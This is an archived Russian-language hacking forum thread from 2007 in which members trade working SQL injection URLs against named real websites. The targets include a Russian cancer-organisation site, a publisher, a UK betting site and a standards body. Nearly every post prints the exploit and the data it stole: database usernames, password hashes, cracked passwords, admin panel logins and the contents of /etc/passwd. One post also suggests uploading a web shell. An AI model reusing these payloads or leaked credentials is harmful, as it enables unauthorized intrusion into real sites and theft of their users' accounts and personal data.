ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
27.12.2007, 16:42
|
|
Познающий
Регистрация: 25.11.2007
Сообщений: 55
Провел на форуме:
493288
Репутация:
58
|
|
http://www.archivespro.ru/index.php?news=-18+union+select+1,2,concat(user(),0x3a,database(), 0x3a,version()),4,5,6,7,8,9,10,11,12/*
archive9_2@localhost:archive9_arhiv:4.1.22-log
|
|
|
27.12.2007, 16:50
|
|
Участник форума
Регистрация: 14.07.2007
Сообщений: 108
Провел на форуме:
1888785
Репутация:
305
|
|
2 159932
Посмотрел robots, по идее должна быть в /admin/, но там нету...
Попробуй таблицы от форума. (phpbb_users) - Если подберешь пасс, то можешь залить шелл...
Код:
http://www.glukometr.ru/article.php?action=ViewArticle&ID=360+UNION+SELECT+1,concat(username,0x3a,user_password),3,4,5+from+gurujen_forum.phpbb_users/*
Ольга:82e0839b64d121ef7154f2b8d5b27351: qween1
Последний раз редактировалось Saint-Sky; 27.12.2007 в 17:46..
|
|
|
|
27.12.2007, 17:25
|
|
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
Провел на форуме:
6722038
Репутация:
1385
|
|
от Saint-Sky
Если подберешь пасс, то можешь залить шелл...
да я то знаю ... просто префикс никак найти не мог .. ты нашёл - возьми с полки пирожок
|
|
|
|
27.12.2007, 17:42
|
|
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
Провел на форуме:
6722038
Репутация:
1385
|
|
ultimate.com.ua
http://www.ultimate.com.ua/ru/?g=news&a=9500+union+select+1,2,3,username,5,user_ password,7+from+phpbb_users/*
Пятая
login: Стрелка
hesh:260a4f2ad2b1ae4ddf66f780172c6ce9
pass: ghjkbd
|
|
|
|
27.12.2007, 17:54
|
|
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме:
14324684
Репутация:
3908
|
|
www.netoncology.ru - Союз Противораковых Организаций России
Аж 4 таблицы с пользователями....
(вывод данных в первой строчке вверху)
Forum_Users:
Код:
http://www.netoncology.ru/view.php?id=-506'+union+select+concat_ws(0x3a,NikName,EMail,Pass)+from+Forum_Users+limit+0,1/*
Users:
Код:
http://www.netoncology.ru/view.php?id=-506'+union+select+concat_ws(0x3a,UserLogin,UserPwd)+from+Users+limit+0,1/*
phpbb_patients_users:
Код:
http://www.netoncology.ru/view.php?id=-506'+union+select+concat_ws(0x3a,username,User_Password)+from+phpbb_patients_users+limit+1,1/*
phpbb_specialists_users:
Код:
http://www.netoncology.ru/view.php?id=-506'+union+select+concat_ws(0x3a,username,User_Password)+from+phpbb_specialists_users+limit+1,1/*
Все таблицы перебираем лимитом...
Админка:
http://netoncology.ru/admin/
login:admin
pass:ghbdtn
С наступающим=)
|
|
|
|
27.12.2007, 18:12
|
|
Участник форума
Регистрация: 14.08.2007
Сообщений: 150
Провел на форуме:
686641
Репутация:
205
|
|
http://koleso.topof.ru/
Код HTML:
http://koleso.topof.ru/product_info.php?pID=1223+UNION+SELECT+1,concat(version(),0x3a,database(),0x3a,user())/*
5.0.22:koleso_ktopof:koleso_ktopof@localhost
Код HTML:
http://koleso.topof.ru/product_info.php?pID=1223+UNION+SELECT+1,table_name+FROM+information_schema.tables/*
Код HTML:
http://koleso.topof.ru/product_info.php?pID=1223+UNION+SELECT+1,concat(admin_id,0x3a,admin_name,0x3a,admin_password)+FROM+admins/*
Код HTML:
http://koleso.topof.ru/product_info.php?pID=1223+UNION+SELECT+1,concat(user_id,0x3a,username,0x3a,user_password,0x3a,user_email,0x3a,user_icq)+FROM+lotus_users/*
P.S. Лимит не нужен =)
|
|
|
|
27.12.2007, 18:28
|
|
Познающий
Регистрация: 18.12.2007
Сообщений: 32
Провел на форуме:
614948
Репутация:
86
|
|
Издательство Дрофа!
Код HTML:
http://www.drofa.ru/index_i.html?id_page=-1+union+select+1,concat(USER(),0x3a,VERSION(),0x3a,DATABASE()),3,4,5,6,7,8,9,10,11,12/*
h_drofa_ru@localhost:4.1.22-log:drofa_ru
|
|
|
|
27.12.2007, 19:52
|
|
Участник форума
Регистрация: 14.08.2007
Сообщений: 150
Провел на форуме:
686641
Репутация:
205
|
|
http://www.aiim.org/
Код HTML:
http://www.aiim.org/standards.asp?id=1+or+1=(SELECT+TOP+1+cast(Email+as+nvarchar)%2B%27%3A%27%2Bcast(PWD+as+nvarchar)+FROM+vwWebUsers+WHERE+ID=10)--
dchapman@aiim.org:6520
С полученным добром заходим на:
http://www.aiim.org/login.asp
P.S. Прокручивайте ID =))
|
|
|
|
27.12.2007, 21:50
|
|
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме:
14324684
Репутация:
3908
|
|
http://www.segfl.org.uk/
Код:
http://www.segfl.org.uk/news/view.php?id=-1+union+select+1,2,3,4,5,concat_ws(0x3a,user,password),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47+from+mysql.user/*
Последний раз редактировалось Ded MustD!e; 27.12.2007 в 22:01..
|
|
|
|
27.12.2007, 23:00
|
|
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
Провел на форуме:
6905523
Репутация:
1174
|
|
Английская букмекерская контора
www.online-betting-guide.co.uk
Код:
http://www.online-betting-guide.co.uk/tips/tipster.php?id=-1+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,user,password),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70+from+mysql.user+limit+5,1+--+
root:2bc39bf13f7a9949
Код:
http://www.online-betting-guide.co.uk/tips/tipster.php?id=-1+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,uname,password,balance,email),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70+from+betting.ad_advertisers+limit+0,1+--+
разрешено чтение файлов
Код:
http://www.online-betting-guide.co.uk/tips/tipster.php?id=-1+union+select+1,2,3,4,5,6,7,8,load_file(0x2F6574632F706173737764),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70+--+
Код:
root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin rpm:x:37:37::/var/lib/rpm:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash nscd:x:28:28:NSCD Daemon:/:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin proftpd:x:1002:103::/home:/sbin/nologin exim:x:93:93::/var/spool/exim:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash invendium:x:1003:1003::/home/backup:/bin/bash
www.tv-history.tv
Код:
http://www.tv-history.tv/preview.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x3a,version(),user(),database()),0x71),0x71),20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44+--+
4.1.15-Debian_1ubuntu5:sqlsixnet@localhost:tv-history
Есть табличка admin
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
